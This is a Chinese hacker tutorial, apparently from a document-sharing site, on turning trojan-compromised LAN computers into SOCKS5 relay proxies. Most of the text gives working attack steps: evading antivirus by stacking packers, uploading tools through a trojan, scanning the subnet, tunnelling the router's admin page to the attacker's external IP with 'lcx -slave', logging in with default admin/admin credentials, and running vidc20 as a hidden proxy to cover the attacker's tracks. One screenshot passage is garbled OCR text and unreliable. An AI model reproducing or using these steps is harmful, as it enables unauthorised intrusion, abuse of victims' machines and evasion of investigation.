《将肉鸡做成sock5服务器.docx》由会员分享,可在线阅读,更多相关《将肉鸡做成sock5服务器.docx(5页珍藏版)》请在三一办公上搜索。
1、话说在挂马得到大量肉鸡以后,众黑友可能都在想如何利用手中的这些战利品。有人喜欢偷 窥人家的隐私,有的人可能就会用木马的键盘记录盗取人家的QQ密码,还有的人可能要盗 取人家的宽带上网帐号充Q币。可大家有没有想到过将内网中的这些肉鸡作成SOCKS5服务 器呢?这样的话,我们以后入侵就可以用这些肉鸡作跳板,黑人家也会安全的多了。有人说 内网中作SOCKS5服务器不可能,即使作成了也无法利用,好,今天我就将我的一些实践经 验写出来与大家共享,没什么技术含量,大家交流一下,如果大家有更好的方法,还请不吝 赐教哟!首先介绍一下使用的工具,lcx.exe这是一个反向连接的内网端口映射工具, VIDC20.e
2、xe也是一个端口映射工具,不过它也有代理服务器的功能,支持 http/socks4/socks5代理,支持代理验证,支持udp代理,支持二级代理;还有S扫描器, 这个只有一个可执行文件,小巧方便,扫端口最合适了。这些工具在网上都有下载,在作代 理服务之前,我们需要先作一下免杀,因为大部分杀毒软件是杀lcx.exe和S扫描器的,如 果不作免杀,那一上传就可能被杀毒软件给杀掉,如图1:畅D迸做I初熟行文件Q104116461113813: 3fIJfflTVijrsen旧txtgC: TItrvi c* i.98C:.心白GG: 1FIKHT匕采ygt 仲32、字湖C官掉t+a32赤eh蚌I 3:
3、轮4C: MrIfflrTty*t*fc32SXPii*2.职*C: IRllTvsj-i-twSETtes-Fc.眯电C: WE句rtLyWWiySTgk.罪噌C: TlRliTsyiitifi32s ti svc. x:eC: TLKHTSystVWj rill pat. txt8BC: MKIRHTsyit32svchiEt.5BG!i32 svch-oi. e bnc. *Rirri3Mpi虾 tjceQ1C Fr*中皈勤 Em are14C册我甘币 占上略做FJnxmHFTLE(理.电心i晦1C: TIfflfTsys,t32c tfii pn. wL5881C: TLjSfTV5s
4、t-effi32cDnjne. tKC1C: WIEHTm尸tKt像这种强悍的卡巴,在命令行下是没有办法中止的,所以只能作免杀了,其他的杀毒软 件在命令行下可以中止,不过需要一些技巧,因为它们都有线程保护,用常规的方法是中止 不了的。我曾经在命令行下干掉过瑞星,只是方法比较繁琐,所以就不在这里演示了。至于 免杀方法嘛,只要简单的加下壳就可以过关了,据我实验,先加个北斗3.5,再加aspack 2.12, 之后再加北斗3.5,这样处理后绝大部分杀软件就不杀这两个程序了,呵呵。简单吧,杀毒 软件也是会区别对待的,如果是一些流行木马,加这三重壳是不能免杀的,对于一些不太重 要的黑客工具,杀毒软件就会
5、显得相对宽松的多了。我们就是钻的杀毒软件的这个空子,如 果是加了三重壳也过不了杀毒软件,那就不要怕麻烦将它们的特征码给修改掉,就可以过杀 毒软件了,修改的方法网上有许多动画,大家可以自己找找,我的PCSHARE马就是这样作的, 过卡巴,瑞星、江民、瑞星、金山、诺顿、趋势等杀毒软件很轻松,也可以轻松过各种查马 工具,这就是我修改特征码后加了三重壳作成的,一个超强的工具。呵呵。有些跑题了,言 归正传。工具准备完备后,下面开始作代理了。首先打开你的木马客户端程序,将上面的这些工 具上传到内网中的肉鸡上,就放在WINDOWS目录里吧,文件名嘛,最好改一下,免得引起对 方注意。打开对方的命令符,键入命令
6、:ipconfig /all查看一下肉鸡的IP地址,如: 192.168.0.2,得到这个本机及网关的IP地址以后,我们就可以用S扫描器对同它同一网段 的IP地址进行扫描,看这台肉鸡的网关是什么类型的。S扫描器相信大家都会用了吧。命令行:s-jk tcp 192.168.0.1 192.168.0.255 80,23,3389,1433,139,445 20这个s-jk是我加三重壳免杀后的S扫描器,这条命令在整个网段中扫描开放139 3389 1433 80 23端口的主机,呵呵,这是为渗透内部网络作准备,也许有很重要的信息出现呢。 哈哈。扫描结果如下图2:图2经过扫描发现这台肉鸡的网关开放8
7、0号端口,这说明这台网关一定是台路由器。那怎 样登录进它的路由器呢?大家都知道宽带路由器在外网中是不能登录的,只能由它的内部网 络登录,难道要进肉鸡的屏幕控制,用肉鸡的IE登录?非也,这样很容易暴露,再说肉鸡上 的管理员也许现在正在电脑前工作,你是根本没有办法进行控制的,下面在自己的电脑上打 开命令提示符,命令:lcx -listen 21 8000再回到肉鸡的CMD下,命令:lcx -slave 218.57.179.152 21 192.168.0.1 80 解释一下:218.57.179.152 是我的外网 IP,这样就将肉鸡的宽带路由器的80端口映射到了我的电脑的21端上了,我连接本机
8、的8000端口就可 以了。如图3:图3下一步就要打开IE,地址栏中键入:http:/127.0.0.1:8000回车后,盼望已久的并且 很熟悉的登录界面出现了。这正是宽带路由器的登录界面,只不过这不是我的宽带路由器, 而是另一个局域网的宽带路由器,我熟练的键入的默认用户名及密码,admin admin,确定 后成功登录了。如图4、图5。图4图5接下来的工作简直就是轻车熟路了,设置一个虚拟服务器指向这台肉鸡,端口设置成了 个陌生的端口,不要设置成8080,因为宽带路由器要使用这个端口,它是不允许设置成这 个端口的,我设置的是2233,保存后,我们再回到肉鸡的命令行下,命令:vidc20 -d -
9、p 2233 这个命令的意思就是以控制台的方式启动vidc20.exe这个程序,开2233服务端口提供代理 服务。这台肉鸡已经开始提供SOCK5服务了,并且路由器上的映射也已经正常工作,我们要 作的就是打开SOCK5客户端程序,设置一下SOCKS5服务器的IP地址及端口,也就是这台肉 鸡的外网IP。我们将IE的图标拖到SocksCap32的图标上创建了一个新快捷方式,这样以 后我们登录到ASP马时就可以双击SocksCap32中的IE进行登录了。如果你觉得不放心,可 以登录,查看一下IP,IP地址显示的是你的肉鸡的IP,使用这种代理比使 用匿名的HTTP代理还要安全的多,因为给你提供代理的是台
10、个人电脑,并且IP不固定,在 一个局域网内部,没有一些监控软件记录任何的连接,并且这台个人电脑重启后vidc20.exe 并不在运行,可以说是毫无痕迹,这样即使有人追查你的话,也只能查到你肉鸡的IP为止, 再想继续追查就不太容易了。有人说如果管理员把宽带路由器的密码改掉了,那不是没得玩了,我随机挑选了五个局 域网进行测试,全部是默认口令,看来设置默认口令的概率还是满高的。我分析了一下原因: 一、可能是宽带路由器只能由内网连接,管理员对其安全性认识不足。二、内网中的电脑用 户都是菜鸟,不需要作安全设置。三、管理员懈怠,没把它当回事。说实话我的宽带路由器 也是设置的默认口令,为什么没有改掉呢?我觉得我应该属于第二种情况吧,内网中全部是 菜鸟用户,所以根本必要修改掉,这样就暴露了一个安全问题,一旦内网中的电脑中了木马, 入侵者就有可能获得你的宽带帐号,用你的宽带帐号刷Q币、刷业务;还可能登录你的ISP 将你的宽带帐号给修改掉,让你上不了网了。如果入侵者拿你作跳板,他作了坏事由你背黑 锅,那岂不是更加冤枉。所以,大家一定对内网的安全问题提高警惕。该打的补丁打上,该 修改的默认口令给修改掉,这样就可以抵御大多数初级的入侵者的攻击了。但要想绝对安全, 那是不可能的,这个世界上没有绝对的安全。
